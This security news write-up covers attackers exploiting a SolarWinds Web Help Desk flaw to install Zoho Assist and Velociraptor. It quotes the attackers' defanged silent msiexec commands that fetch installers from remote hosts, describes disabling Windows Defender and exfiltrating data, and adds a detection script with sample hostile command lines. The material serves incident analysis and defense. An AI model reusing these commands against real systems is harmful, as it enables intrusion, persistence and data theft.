Hackers Exploit SolarWinds Web Help Desk Vulnerability to Deploy Remote Management Tools
A critical remote code execution (RCE) vulnerability in SolarWinds Web Help Desk (WHD) is currently being actively exploited by cyber attackers. These threat actors are leveraging the flaw to deploy legitimate administrative tools, thereby gaining unauthorized access and control over affected systems.
Scope of the Exploitation
Security firm Huntress has identified that 84 endpoints across 78 organizations within its partner network are running vulnerable versions of SolarWinds WHD. This widespread exposure underscores the urgency for organizations to address the vulnerability promptly.
Attack Methodology
The exploitation sequence observed by Huntress is as follows:
1. Initial Compromise: The attack begins with the execution of `wrapper.exe`, the WHD service wrapper, which subsequently launches `java.exe`, the underlying Tomcat-based application.
2. Payload Deployment: The Java process then executes `cmd.exe` to silently install a remote MSI payload using the following command:
```
msiexec /q /i hxxps://files.catbox[.]moe/tmp9fc.msi
```
This command fetches and installs a Zoho ManageEngine Remote Monitoring and Management (RMM) agent, specifically Zoho Assist, from the Catbox file-hosting service.
3. Establishing Remote Access: Zoho Assist, while a legitimate remote management tool, is exploited in this context to provide persistent, unattended access to the compromised system. The agent registers to an attacker-controlled Zoho account linked to a Proton Mail address, granting the attacker immediate interactive control over the system.
Alignment with Previous Advisories
This attack pattern aligns closely with Microsoft’s advisory issued on February 6, which confirmed in-the-wild exploitation of SolarWinds WHD vulnerabilities for RCE and subsequent deployment of remote management tools.
Post-Exploitation Activities
Once the RMM agent is active, attackers engage in several post-exploitation activities:
– Reconnaissance: Utilizing the Zoho RMM process (`TOOLSIQ.EXE`), attackers perform Active Directory reconnaissance to enumerate domain-joined systems.
– Deployment of Additional Tools: Attackers deploy Velociraptor, an open-source Digital Forensics and Incident Response (DFIR) platform, via another silent MSI installer hosted on an attacker-controlled Supabase bucket:
```
msiexec /q /i hxxps://vdfccjpnedujhrzscjtq.supabase[.]co/…/v4.msi
```
Velociraptor is configured to communicate with attacker infrastructure hosted behind a Cloudflare Worker (`auth.qgtxtebl.workers[.]dev`), a tactic previously associated with ToolShell exploitation and Warlock ransomware activity.
– Execution of Malicious Commands: The attacker executes a series of base64-encoded PowerShell commands to disable Windows Defender and the Windows Firewall via registry modifications. This is followed by the installation of Cloudflared from GitHub’s official release channel, creating a secondary tunnel-based access path for redundancy.
– Data Exfiltration: System information is collected using the `Get-ComputerInfo` command and exfiltrated directly into an attacker-controlled Elastic Cloud deployment via the Bulk API. This method repurposes Elastic’s SIEM tooling to build a centralized victim management and triage platform.
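As an added detection example (not code from the article or from Huntress), the following Python checks process-creation telemetry for the two behaviours described in the attack chain above and in the post-exploitation steps: a silent msiexec install from a URL whose process ancestry runs through the WHD wrapper.exe and java.exe, and encoded PowerShell launched beneath the Zoho Assist process (TOOLSIQ.EXE). The event records, file paths and URL are constructed sample data.

```python
import re
from collections import namedtuple
from pathlib import PureWindowsPath

# One process-creation record in the shape of Sysmon Event ID 1 fields.
Event = namedtuple("Event", "pid ppid image cmdline")

# Constructed sample telemetry (not data from the article). The first chain mirrors the
# described lineage wrapper.exe -> java.exe -> cmd.exe -> msiexec; the explorer.exe chain
# is a benign local install that must not alert.
SAMPLE_EVENTS = [
    Event(400, 1, r"C:\WHD\bin\wrapper.exe", "wrapper.exe -s"),
    Event(410, 400, r"C:\WHD\jre\bin\java.exe", "java.exe -Dcatalina.base=C:\\WHD"),
    Event(520, 410, r"C:\Windows\System32\cmd.exe",
          "cmd.exe /c msiexec /q /i https://files.example.invalid/tmp9fc.msi"),
    Event(521, 520, r"C:\Windows\System32\msiexec.exe",
          "msiexec /q /i https://files.example.invalid/tmp9fc.msi"),
    Event(600, 1, r"C:\Windows\explorer.exe", "explorer.exe"),
    Event(610, 600, r"C:\Windows\System32\msiexec.exe", r"msiexec /i C:\Installers\7zip.msi"),
    Event(700, 1, r"C:\ZohoAssist\TOOLSIQ.EXE", "TOOLSIQ.EXE"),
    Event(710, 700, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
          "powershell.exe -nop -w hidden -EncodedCommand UwBlAHQALQBNAHAAUAByAGUAZgA="),
]

REMOTE_MSI = re.compile(r"msiexec(\.exe)?\b.*\s/i\s+https?://", re.IGNORECASE)  # /i <URL>
ENCODED_PS = re.compile(r"\s-(enc\w*|e|ec)\s+[A-Za-z0-9+/=]{16,}", re.IGNORECASE)
RMM_IMAGES = {"toolsiq.exe"}  # Zoho Assist agent process named in the article

def lineage(events, pid):
    """Return image basenames (lowercased) from pid up to the root of its process tree."""
    by_pid = {e.pid: e for e in events}
    chain = []
    while pid in by_pid:
        chain.append(PureWindowsPath(by_pid[pid].image).name.lower())
        pid = by_pid[pid].ppid
    return chain

def detect(events):
    """Return (pid, reason) findings; ancestry decides how specific the finding is."""
    findings = []
    for e in events:
        chain = lineage(events, e.pid)
        if chain[0] == "msiexec.exe" and REMOTE_MSI.search(e.cmdline):
            if "java.exe" in chain and "wrapper.exe" in chain:
                findings.append((e.pid, "remote MSI install spawned from WHD java.exe"))
            else:
                findings.append((e.pid, "remote MSI install from URL"))
        elif chain[0] == "powershell.exe" and ENCODED_PS.search(e.cmdline) \
                and RMM_IMAGES & set(chain[1:]):
            findings.append((e.pid, "encoded PowerShell launched under RMM agent"))
    return findings
```

Running `detect(SAMPLE_EVENTS)` flags only pids 521 and 710; the local 7zip install under explorer.exe produces no finding.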
Implications for Organizations
This campaign highlights the rapid progression from initial exploitation of an internet-exposed management interface to full interactive control and persistence within enterprise environments. The use of legitimate tools like Zoho Assist and Velociraptor allows attackers to blend their activities with normal administrative operations, making detection more challenging.
Recommendations
Organizations using SolarWinds Web Help Desk should take the following actions immediately:
1. Apply Patches: Ensure that all instances of SolarWinds WHD are updated to the latest version that addresses the RCE vulnerability.
2. Monitor for Indicators of Compromise (IoCs): Review system logs for unusual activities, such as unexpected installations of remote management tools or execution of PowerShell commands.
3. Restrict Internet Exposure: Limit the exposure of management interfaces to the internet by implementing network segmentation and access controls.
4. Enhance Detection Capabilities: Deploy endpoint detection and response (EDR) solutions to identify and mitigate malicious activities promptly.
5. Conduct Security Awareness Training: Educate IT staff about the risks associated with remote management tools and the importance of maintaining secure configurations.
By implementing these measures, organizations can reduce the risk of exploitation and enhance their overall security posture.